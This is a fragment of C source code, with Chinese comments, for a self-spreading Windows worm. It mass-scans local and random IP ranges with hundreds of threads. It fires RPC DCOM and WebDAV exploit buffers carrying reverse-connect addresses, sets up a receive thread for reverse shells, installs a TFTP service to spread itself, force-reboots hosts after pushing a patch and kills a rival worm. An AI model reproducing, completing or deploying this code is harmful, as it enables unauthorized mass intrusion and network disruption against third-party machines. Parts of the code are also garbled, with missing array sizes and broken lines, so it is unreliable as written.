nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~ 
else{ 
nLanguageID = -1; 
} 

if ( nLanguageID == -1) 
return FALSE; 

char szServicePack = "RpcServicePack.exe"; 

// downlaod it~~~ 
if ( !nSystemVer ) { // 2k 
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl) ) 
return FALSE; 
} 
else{ 
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl) ) 
return FALSE; 
} 

char szExec; 
sprintf(szExec, "%s -n -o -z -q", szServicePack); 

HANDLE hProcess = MakeProcess( szExec ); 
if ( hProcess == NULL ) 
return FALSE; 

if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内 
未完成 
TerminateProcess(hProcess,1); 
CloseHandle(hProcess); 
DeleteFile(szServicePack); 
return FALSE; 
} 
CloseHandle(hProcess); 

Sleep(15000); 
DeleteFile(szServicePack); 
if ( ReadRegServicePack(nSystemVer) ) { 
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot 
it~~~ 
Sleep(20000); //说偶重启有过？ 不重启补丁无效， 
找 Bill该死 说去~~~ 
} 

return TRUE; 
} 

// IN: 始ip, B段数量, 是否随机，是否换WebDav //更烂~~~ 凑合着看~~~ 
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL 
bWebDav) 
{ 
HANDLE hThread = NULL; 
BOOL bFirst = TRUE; 
u_long uComp; 

for (int i=0;i< (nBCount * 256 * 256); i++){ 

if ( bRand ) 
uComp = MakeRandIp(); 
else 
uComp = i + ulIpStart; 

if ( //还是屏蔽掉部分目标，免得目标中招后，再玩就把下一代干掉了，不破坏的好 
:)~~~ 
(BYTE)uComp == 0xc5 || 
(BYTE)(uComp>>8) == 0xc5 || 
(BYTE)(uComp>>16) == 0xc5 || 
(BYTE)(uComp>>24) == 0xc5 || 
(WORD)uComp == 0x9999 || 
(WORD)(uComp>>8) == 0x9999 || 
(WORD)(uComp>>16) == 0x9999 ) 
continue; 


u_long *myPara = new u_long; 

if ( myPara == NULL ){//如果分配失败，再尝试一次 
Sleep(100); 
myPara = new u_long; 
} 

if ( myPara ){ 
if ( hThread ) 
CloseHandle(hThread); 

*myPara = htonl( uComp); 

DWORD dwThreadId; 

if (bWebDav) 
hThread = 
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,&dwThreadId); 
else 
hThread = 
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,&dwThreadId); 

Sleep(2); 
} 

//添加此处代码，避免首次执行时，线程中的 
InterlockedIncrement(&g_CurThreadCount) 未来得及运行，一次性建立了N个线程的 
bug! 
if ( bFirst && (i >= nMaxThread) ){ 
Sleep(2000); 
bFirst = FALSE; 
} 

while(g_CurThreadCount >= nMaxThread) // #define nMaxThread 300 ,不小心， 
玩过了~~~ 
Sleep(2); 

} 

Sleep(60000); 
} 


//服务模式和控制台模式公用主程序 
void DoIt() 
{ 
WSADATAwsd; 
if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
return; 

//杀蠕虫 
KillMsblast(); 

//卸载 
SYSTEMTIME st; 
GetLocalTime(&st); 
if ( st.wYear == 2004 ){ 
MyDeleteService(szServiceName); 
MyDeleteService(szServiceTftpd); 
RemoveMe(); 
ExitProcess(1); //其实不必，RemoveMe()中借用了前辈的代码，2k下，退出程序时将 
自身文件删除了 
} 

srand( GetTickCount() ); 

memset(pPingBuffer, '\xAA', sizeof(pPingBuffer)); 
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补 
丁已经打够了!~~~ 


//准备WebDav发送缓冲区 
do{ 
pWebDavExploitBuffer = new char; 
Sleep(100); 
}while(pWebDavExploitBuffer == NULL); 

//必须在checkonlien 之前,一次装配好子弹 
PressWebDavBufferOnce(); 
PressRpcDcomBufferOnce(); 

CheckOnlienAndPressData(); //get LocalIp & 修正子弹中的反向ip 和 端口 

//打补丁 
DoServicePackFunction(); 

//建立接收线程 
DWORD dwThreadID; 
HANDLE 
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L 
PVOID)NULL,0,&dwThreadID); 
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞，有反连，再建线程处理之, 
同时处理多个反连 
return; 
CloseHandle(hWorkThread); 

if ( !MyStartService(szServiceTftpd) ){ 
Sleep(1000); 
InstallTftpService(); 
Sleep(1000); 
MyStartService(szServiceTftpd); 
} 

Sleep(2000); //等待接收线程中的全局 rand bind port 


u_long ulIP; 
for(;;){ //估算了一下，普通机器２小时一循环 


//首先扫描本ip段 
CheckOnlienAndPressData(); 
ulIP = ntohl(inet_addr(szLocalIp)); 
ulIP &= 0xffff0000; 
BeginExploitFunction( ulIP, 1, 0, 0); 


//再扫描本ip前后3个段 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
ulIP += 0x00010000; 
else 
ulIP -= 0x00030000; 
BeginExploitFunction( ulIP, 3, 0, 0); 


//再扫描WebDav一个段,跳出 135 syn封锁 
CheckOnlienAndPressData(); 
ulIP = MAKELONG(0, wdIpHead); //请 wdIpHead B段IP商注意~~~, 
立即采取补救措施~~~ sorry~~~ 
BeginExploitFunction( ulIP, 1, 0, 1); 


//再扫描随机的IP, 数量1个 B段, rpc or webdav 
CheckOnlienAndPressData(); 
if ( rand() % 2) 
BeginExploitFunction( ulIP, 1, 1, 0); 
else 
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~ 


KillMsblast(); 

} 

//WSACleanup(); 

}